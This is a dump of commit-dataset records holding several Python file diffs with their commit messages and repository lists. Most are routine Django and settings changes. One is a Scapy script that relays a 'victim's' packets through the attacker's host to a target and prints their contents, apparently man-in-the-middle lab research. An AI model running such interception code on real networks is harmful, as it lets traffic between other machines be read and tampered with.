# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', loader_page, name='loader'),
url(r'^home/$', home_page, name='index'),
url(r'^resume/$', resume_page, name='resume'),
url(r'^projects/$', projects_page, name='projects'),
url(r'^contact/$', contact_page, name='contact'),
url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
<commit_msg>Change default URL to display home content. Temporary fix.<commit_after>from django.conf.urls import patterns, include, url
from MyHub.home.views import home_page
from MyHub.resume.views import resume_page
from MyHub.projects.views import projects_page
from MyHub.contact.views import contact_page
from MyHub.views import loader_page
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'MyHub.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', home_page, name='loader'),
# url(r'^home/$', home_page, name='index'),
# url(r'^resume/$', resume_page, name='resume'),
# url(r'^projects/$', projects_page, name='projects'),
# url(r'^contact/$', contact_page, name='contact'),
# url(r'^admin/', include(admin.site.urls)),
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
86a26fb8a2f9754a27763cb04292735bc31d0fe7 | admin/subjects/views.py | admin/subjects/views.py | from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.edit_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
| from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.change_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
| Change permission to correct codename of change_subject | Change permission to correct codename of change_subject
| Python | apache-2.0 | felliott/osf.io,sloria/osf.io,Johnetordoff/osf.io,Johnetordoff/osf.io,Johnetordoff/osf.io,baylee-d/osf.io,TomBaxter/osf.io,felliott/osf.io,icereval/osf.io,crcresearch/osf.io,icereval/osf.io,caneruguz/osf.io,aaxelb/osf.io,chennan47/osf.io,aaxelb/osf.io,brianjgeiger/osf.io,pattisdr/osf.io,HalcyonChimera/osf.io,adlius/osf.io,chrisseto/osf.io,chrisseto/osf.io,icereval/osf.io,pattisdr/osf.io,crcresearch/osf.io,aaxelb/osf.io,adlius/osf.io,caseyrollins/osf.io,mfraezz/osf.io,laurenrevere/osf.io,binoculars/osf.io,HalcyonChimera/osf.io,erinspace/osf.io,caseyrollins/osf.io,chrisseto/osf.io,TomBaxter/osf.io,CenterForOpenScience/osf.io,sloria/osf.io,CenterForOpenScience/osf.io,caneruguz/osf.io,CenterForOpenScience/osf.io,pattisdr/osf.io,erinspace/osf.io,caneruguz/osf.io,cslzchen/osf.io,erinspace/osf.io,felliott/osf.io,cslzchen/osf.io,mfraezz/osf.io,adlius/osf.io,cslzchen/osf.io,Johnetordoff/osf.io,laurenrevere/osf.io,adlius/osf.io,chennan47/osf.io,HalcyonChimera/osf.io,chrisseto/osf.io,saradbowman/osf.io,saradbowman/osf.io,brianjgeiger/osf.io,leb2dg/osf.io,mattclark/osf.io,HalcyonChimera/osf.io,baylee-d/osf.io,mattclark/osf.io,mfraezz/osf.io,cslzchen/osf.io,laurenrevere/osf.io,crcresearch/osf.io,caneruguz/osf.io,baylee-d/osf.io,felliott/osf.io,mattclark/osf.io,binoculars/osf.io,aaxelb/osf.io,binoculars/osf.io,brianjgeiger/osf.io,caseyrollins/osf.io,leb2dg/osf.io,leb2dg/osf.io,brianjgeiger/osf.io,leb2dg/osf.io,chennan47/osf.io,mfraezz/osf.io,CenterForOpenScience/osf.io,TomBaxter/osf.io,sloria/osf.io | from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.edit_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
Change permission to correct codename of change_subject | from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.change_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
| <commit_before>from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.edit_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
<commit_msg>Change permission to correct codename of change_subject<commit_after> | from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.change_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
| from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.edit_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
Change permission to correct codename of change_subjectfrom django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.change_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
| <commit_before>from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.edit_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
<commit_msg>Change permission to correct codename of change_subject<commit_after>from django.contrib.auth.mixins import PermissionRequiredMixin
from django.core.urlresolvers import reverse_lazy
from django.views.generic import ListView, UpdateView
from admin.subjects.forms import SubjectForm
from osf.models.subject import Subject
from osf.models.preprint_provider import PreprintProvider
class SubjectListView(PermissionRequiredMixin, ListView):
model = Subject
permission_required = 'osf.view_subject'
paginate_by = 100
raise_exception = True
def get_queryset(self):
req_obj = self.request.GET
qs = super(SubjectListView, self).get_queryset().order_by('text')
if PreprintProvider.objects.filter(_id=req_obj.get('provider_id')).exists():
qs = qs.filter(provider___id=req_obj.get('provider_id'))
return qs
def get_context_data(self, **kwargs):
context = super(SubjectListView, self).get_context_data(**kwargs)
context['filterable_provider_ids'] = dict({'': '---'}, **dict(PreprintProvider.objects.values_list('_id', 'name')))
return context
class SubjectUpdateView(PermissionRequiredMixin, UpdateView):
form_class = SubjectForm
model = SubjectForm.Meta.model
permission_required = 'osf.change_subject'
raise_exception = True
def get_success_url(self, *args, **kwargs):
return reverse_lazy('subjects:list')
|
d0651d590f558f69f2c09230daf59336ac3f6406 | molo/core/api/constants.py | molo/core/api/constants.py | from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "content_type"),
second="parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
| from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "article_content_type"),
second="article_parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
| Change article session variable names | Change article session variable names
| Python | bsd-2-clause | praekelt/molo,praekelt/molo,praekelt/molo,praekelt/molo | from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "content_type"),
second="parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
Change article session variable names | from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "article_content_type"),
second="article_parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
| <commit_before>from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "content_type"),
second="parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
<commit_msg>Change article session variable names<commit_after> | from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "article_content_type"),
second="article_parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
| from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "content_type"),
second="parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
Change article session variable namesfrom collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "article_content_type"),
second="article_parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
| <commit_before>from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "content_type"),
second="parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
<commit_msg>Change article session variable names<commit_after>from collections import namedtuple
CONTENT_TYPES = [
("core.ArticlePage", "Article"),
("core.SectionPage", "Section"),
]
ENDPOINTS = [
("page", "api/v1/pages")
]
SESSION_VARS = namedtuple(
"SESSION_VARS",
["first", "second", ]
)
ARTICLE_SESSION_VARS = SESSION_VARS(
first=("url", "article_content_type"),
second="article_parent_page_id"
)
API_PAGES_ENDPOINT = "/api/v2/pages/"
API_IMAGES_ENDPOINT = "/api/v2/images/"
|
818023e8bdfe607efe9c31bfd70487b0195c4861 | Scapy/ip_forward.py | Scapy/ip_forward.py | #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7B:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
| #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7b:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
if(packet[TCP]):
# sprintf("{Raw:%Raw.load%\n}")
print str(packet) + "\n"
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
#sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
| Add ip forwarding and packet by packet sniffing code. | Add ip forwarding and packet by packet sniffing code.
| Python | mit | illinoistech-itm/pykkon,illinoistech-itm/pykkon,Illinois-tech-ITM/BSMP-2016-ISCSI-Packet-Injection,Illinois-tech-ITM/BSMP-2016-ISCSI-Packet-Injection,illinoistech-itm/pykkon,Illinois-tech-ITM/BSMP-2016-ISCSI-Packet-Injection | #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7B:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
Add ip forwarding and packet by packet sniffing code. | #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7b:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
if(packet[TCP]):
# sprintf("{Raw:%Raw.load%\n}")
print str(packet) + "\n"
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
#sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
| <commit_before>#!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7B:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
<commit_msg>Add ip forwarding and packet by packet sniffing code.<commit_after> | #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7b:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
if(packet[TCP]):
# sprintf("{Raw:%Raw.load%\n}")
print str(packet) + "\n"
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
#sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
| #!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7B:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
Add ip forwarding and packet by packet sniffing code.#!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7b:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
if(packet[TCP]):
# sprintf("{Raw:%Raw.load%\n}")
print str(packet) + "\n"
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
#sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
| <commit_before>#!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7B:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
<commit_msg>Add ip forwarding and packet by packet sniffing code.<commit_after>#!/etc/usr/python
from scapy.all import *
import sys
iface = "eth0"
filter = "ip"
#victim in this case is the initiator
VICTIM_IP = "192.168.1.121"
MY_IP = "192.168.1.154"
# gateway is the target
GATEWAY_IP = "192.168.1.171"
#VICTIM_MAC = "### don't want so show###"
MY_MAC = "08:00:27:7b:80:18"
#target mac address
GATEWAY_MAC = "08:00:27:24:08:34"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = GATEWAY_MAC
# TODO: block iscsi packets with an if condition
if(packet[TCP]):
# sprintf("{Raw:%Raw.load%\n}")
print str(packet) + "\n"
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
#printing redirected packets load
#sprintf("{Raw:%Raw.load%\n}")
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
|
a65d65ce536a0a6dbc01f7f31db4bbabd08ec223 | project_template/project_settings.py | project_template/project_settings.py | # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.glamkit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
| # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.icekit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
| Use ICEkit settings by default again. | Use ICEkit settings by default again.
| Python | mit | ic-labs/django-icekit,ic-labs/django-icekit,ic-labs/django-icekit,ic-labs/django-icekit | # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.glamkit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
Use ICEkit settings by default again. | # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.icekit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
| <commit_before># Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.glamkit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
<commit_msg>Use ICEkit settings by default again.<commit_after> | # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.icekit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
| # Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.glamkit import * # glamkit, icekit
# Override the default ICEkit settings to form project settings.
Use ICEkit settings by default again.# Do not commit secrets to VCS.
# Local environment variables will be loaded from `.env.local`.
# Additional environment variables will be loaded from `.env.$DOTENV`.
# Local settings will be imported from `project_settings_local.py`
from icekit.project.settings.icekit import * # glamkit, icekit
